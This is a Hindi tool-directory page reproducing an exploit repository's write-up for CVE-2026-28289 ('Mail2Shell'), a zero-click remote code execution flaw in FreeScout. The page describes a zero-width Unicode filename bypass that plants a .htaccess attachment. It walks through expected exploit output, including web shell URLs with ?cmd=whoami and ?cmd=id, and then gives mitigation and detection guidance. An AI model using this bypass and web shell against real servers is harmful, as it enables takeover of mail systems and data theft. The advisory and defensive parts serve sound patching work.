Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-28289 — CVE-2026-28289 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-28289
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंटईमेल सुरक्षा
GitHub0xblackash/cve-2026-28289

CVE-2026-28289

CVE-2026-28289

रिपॉजिटरी देखें
156 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2026-28289 — "Mail2Shell"

1772564185117

FreeScout में ईमेल अनुलग्नक बायपास के ज़रिए ज़ीरो-क्लिक, बिना प्रमाणीकरण के RCE

Severity CVSS Affected Patched


📖 अवलोकन

CVE-2026-28289, जिसे Mail2Shell उपनाम दिया गया है, FreeScout को प्रभावित करने वाली एक गंभीर ज़ीरो-क्लिक रिमोट कोड निष्पादन (Remote Code Execution - RCE) भेद्यता है।

एक हमलावर FreeScout मेलबॉक्स पर एक विशेष रूप से तैयार किया गया ईमेल भेज सकता है और बिना प्रमाणीकरण और बिना उपयोगकर्ता सहभागिता के अंतर्निहित सर्वर तक रिमोट शेल एक्सेस प्राप्त कर सकता है।


🧠 भेद्यता सारांश

टूल डाउनलोड करें
फ़ील्डमान
CVE IDCVE-2026-28289
गंभीरता🔴 गंभीर
CVSS10.0 (अधिकतम)
हमला वेक्टररिमोट (ईमेल)
प्रमाणीकरण आवश्यक❌ नहीं
उपयोगकर्ता सहभागिता❌ नहीं
प्रभावपूर्ण सर्वर समझौता

⚙️ तकनीकी विवरण

📨 चरण 1 — दुर्भावनापूर्ण ईमेल डिलीवरी

हमलावर एक विशेष रूप से तैयार किए गए अनुलग्नक के साथ एक ईमेल भेजता है।

🧩 चरण 2 — फ़ाइलनाम सैनिटाइज़ेशन बायपास

FreeScout .htaccess जैसी खतरनाक फ़ाइलों को ब्लॉक करने का प्रयास करता है, लेकिन हमलावर:

  • एक शून्य-चौड़ाई वाला यूनिकोड कैरेक्टर जोड़ता है
  • फ़ाइलनाम सत्यापन को बायपास करता है
  • फ़ाइल एक वैध निष्पादन योग्य सर्वर फ़ाइल के रूप में सहेजी जाती है

💣 चरण 3 — रिमोट निष्पादन

हमलावर वेब पथ के माध्यम से अपलोड की गई फ़ाइल तक पहुँचता है और मनमाने कमांड निष्पादित करता है।

परिणाम:

root@kitploit:~
# Remote shell access achieved
whoami
www-data

✅ यदि ऑपरेशन सफल होता है, तो आपको बिल्कुल यही दिखाई देगा (चरण दर चरण):

mail2shell

1. आपके टर्मिनल में (स्क्रिप्ट चलाने के तुरंत बाद)

root@kitploit:~
✅ Email sent successfully! (Zero-Click RCE triggered)

अगले चरणों के निर्देश भी आपको प्रिंट होकर दिखाई देंगे।

2. जब आप SSH के माध्यम से अपने FreeScout सर्वर पर find कमांड चलाते हैं

यह तुरंत अपलोड की गई फ़ाइल का पूरा वास्तविक पथ लौटाएगा, उदाहरण के लिए:

root@kitploit:~
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt

(या समान दिनांक/समय फ़ोल्डर — यह पुष्टि करता है कि FreeScout ने अनुलग्नक को स्वचालित रूप से सहेज लिया है)।

3. सफलता का वास्तविक प्रमाण — आपके ब्राउज़र में (यह वह क्षण है जब आप जान जाते हैं कि आपके पास पूर्ण RCE है)

चरण 2 से पथ कॉपी करें और यह URL खोलें:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami

आपको यह सटीक आउटपुट दिखाई देगा (प्लेन टेक्स्ट):

root@kitploit:~
www-data

(या जो भी Apache/PHP उपयोगकर्ता आपके सर्वर पर है — आमतौर पर www-data, apache, या nobody)।

अब कमांड बदलें और रिफ्रेश करें:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id

आपको दिखाई देगा:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

और ls -la के लिए:

root@kitploit:~
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar  5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar  5 14:00 ..
-rw-r--r-- 1 www-data www-data   87 Mar  5 15:00 webshell.txt

यह आउटपुट ब्राउज़र पेज में सीधे दिखाई देता है (वेबशेल के <pre> टैग के अंदर)। कोई त्रुटि नहीं, कोई PHP स्रोत कोड नहीं, कोई 404 नहीं।

इसका मतलब है कि आपके पास सर्वर पर पूर्ण रिमोट कोड निष्पादन है — .htaccess + शून्य-चौड़ाई स्पेस बायपास पूरी तरह से काम कर गया, और ईमेल अनुलग्नक को बिना किसी उपयोगकर्ता सहभागिता के संसाधित किया गया।


🎯 यह खतरनाक क्यों है

  • ⚡ ज़ीरो-क्लिक शोषण
  • 🌐 रिमोट हमला सतह (ईमेल)
  • 🔓 कोई प्रमाणीकरण आवश्यक नहीं
  • 🧨 पूर्ण RCE क्षमता
  • 📂 डेटा बहिर्गमन की संभावना
  • 🔁 आंतरिक नेटवर्क में लेटरल मूवमेंट

📦 प्रभावित संस्करण

FreeScout के सभी संस्करण:

root@kitploit:~
<= 1.8.206

✅ पैच किया गया संस्करण

तुरंत अपग्रेड करें:

root@kitploit:~
1.8.207 or later

🛡️ शमन कदम

1️⃣ तत्काल कार्रवाई

  • FreeScout को नवीनतम संस्करण में अपग्रेड करें

2️⃣ वेब सर्वर को सख्त बनाएं

  • Apache कॉन्फ़िग में AllowOverride All अक्षम करें
  • अनुलग्नक निर्देशिकाओं के अंदर निष्पादन प्रतिबंधित करें

3️⃣ लॉग की निगरानी करें

इनकी तलाश करें:

  • संदिग्ध .htaccess फ़ाइलें
  • असामान्य अनुलग्नक अपलोड
  • /storage/attachments/ तक सीधे पहुँच के प्रयास

🔍 पहचान युक्तियाँ

समझौता संकेतक (Indicators of Compromise) में शामिल हो सकते हैं:

  • अनुलग्नक फ़ोल्डरों में अज्ञात .htaccess फ़ाइलें
  • आउटबाउंड ट्रैफ़िक में असामान्य वृद्धि
  • वेब सर्वर द्वारा शेल प्रोसेस स्पॉन करना
  • अनुलग्नक पथों पर संदिग्ध POST/GET अनुरोध

🧪 प्रूफ-ऑफ-कॉन्सेप्ट (अवधारणात्मक)

root@kitploit:~
Email → Malicious Attachment (Unicode prefixed filename)
        ↓
Saved to predictable path
        ↓
Web-accessible execution
        ↓
Remote shell

📌 संबंधित भेद्यता

यह समस्या निम्न में जोड़ी गई सुरक्षाओं को बायपास करती है:

  • CVE-2026-27636

अपूर्ण फ़ाइलनाम सैनिटाइज़ेशन तर्क को प्रदर्शित करती है।


📊 प्रभाव आकलन

जोखिम क्षेत्रप्रभाव
गोपनीयता🔴 उच्च
अखंडता🔴 उच्च
उपलब्धता🔴 उच्च

🧩 सीखे गए सबक

  • सत्यापन से पहले यूनिकोड हैंडलिंग को सामान्यीकृत किया जाना चाहिए
  • केवल फ़ाइलनाम फ़िल्टरिंग पर कभी भरोसा न करें
  • अनुलग्नक निर्देशिकाओं में कभी भी कोड निष्पादन की अनुमति नहीं होनी चाहिए
  • ज़ीरो-क्लिक वेक्टर उच्च-जोखिम वाली हमला सतह हैं

📚 संदर्भ

  • FreeScout सुरक्षा सलाह
  • CVE-2026-28289 के लिए NVD प्रविष्टि

🚨 अंतिम अनुशंसा

यदि आप FreeScout का स्व-होस्टेड इंस्टेंस चलाते हैं:

🔥 तुरंत पैच करें। 💡 यदि कमजोर संस्करण इंटरनेट पर उजागर हैं तो समझौता मानें। 🛡 लॉग समीक्षा और अखंडता जाँच करें।